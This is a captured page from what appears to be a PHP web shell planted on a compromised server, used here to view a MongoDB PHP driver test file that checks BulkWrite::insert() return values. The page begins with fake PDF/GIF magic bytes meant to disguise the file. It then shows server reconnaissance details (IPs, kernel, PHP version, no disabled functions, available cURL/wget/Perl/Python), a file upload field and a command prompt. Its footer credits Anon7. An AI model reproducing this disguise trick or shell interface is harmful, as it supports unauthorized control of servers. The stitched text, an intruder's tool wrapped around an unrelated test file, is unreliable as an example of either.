%PDF-1.7 GIF89;
shell
Server IP : 172.66.157.178  /  Your IP : 172.16.20.3
Web Server : Apache/2.4.25 (Debian)
System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User : application ( 1000)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/local/lib/php/test/mongodb/tests/bulk/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /usr/local/lib/php/test/mongodb/tests/bulk/bulkwrite-insert-004.phpt
--TEST--
MongoDB\Driver\BulkWrite::insert() returns "_id" of inserted document
--SKIPIF--
<?php require __DIR__ . "/../utils/basic-skipif.inc"; ?>
<?php skip_if_not_live(); ?>
<?php skip_if_not_clean(); ?>
--FILE--
<?php
require_once __DIR__ . "/../utils/basic.inc";

class MySerializableId implements MongoDB\BSON\Serializable
{
    public $id;

    public function __construct($id)
    {
        $this->id = $id;
    }

    public function bsonSerialize()
    {
        return ['id' => $this->id];
    }
}

class MyPersistableId extends MySerializableId implements MongoDB\BSON\Persistable
{
    public function bsonUnserialize(array $data)
    {
        $this->id = $data['id'];
    }
}

$documents = [
    ['x' => 1],
    ['_id' => new MongoDB\BSON\ObjectId('590b72d606e9660190656a55')],
    ['_id' => ['foo' => 1]],
    ['_id' => new MySerializableId('foo')],
    ['_id' => new MyPersistableId('bar')],
];

$manager = new MongoDB\Driver\Manager(URI);

$bulk = new MongoDB\Driver\BulkWrite();

foreach ($documents as $document) {
    var_dump($bulk->insert($document));
}

$result = $manager->executeBulkWrite(NS, $bulk);
printf("Inserted %d document(s)\n", $result->getInsertedCount());

$cursor = $manager->executeQuery(NS, new MongoDB\Driver\Query([]));
var_dump($cursor->toArray());

?>
===DONE===
<?php exit(0); ?>
--EXPECTF--
object(MongoDB\BSON\ObjectId)#%d (%d) {
  ["oid"]=>
  string(24) "%x"
}
object(MongoDB\BSON\ObjectId)#%d (%d) {
  ["oid"]=>
  string(24) "590b72d606e9660190656a55"
}
object(stdClass)#%d (%d) {
  ["foo"]=>
  int(1)
}
object(stdClass)#%d (%d) {
  ["id"]=>
  string(3) "foo"
}
object(MyPersistableId)#%d (%d) {
  ["id"]=>
  string(3) "bar"
}
Inserted 5 document(s)
array(5) {
  [0]=>
  object(stdClass)#%d (%d) {
    ["_id"]=>
    object(MongoDB\BSON\ObjectId)#%d (%d) {
      ["oid"]=>
      string(24) "%x"
    }
    ["x"]=>
    int(1)
  }
  [1]=>
  object(stdClass)#%d (%d) {
    ["_id"]=>
    object(MongoDB\BSON\ObjectId)#%d (%d) {
      ["oid"]=>
      string(24) "590b72d606e9660190656a55"
    }
  }
  [2]=>
  object(stdClass)#%d (%d) {
    ["_id"]=>
    object(stdClass)#%d (%d) {
      ["foo"]=>
      int(1)
    }
  }
  [3]=>
  object(stdClass)#%d (%d) {
    ["_id"]=>
    object(stdClass)#%d (%d) {
      ["id"]=>
      string(3) "foo"
    }
  }
  [4]=>
  object(stdClass)#%d (%d) {
    ["_id"]=>
    object(MyPersistableId)#%d (%d) {
      ["id"]=>
      string(3) "bar"
    }
  }
}
===DONE===

Anon7 - 2022
SCDN GOK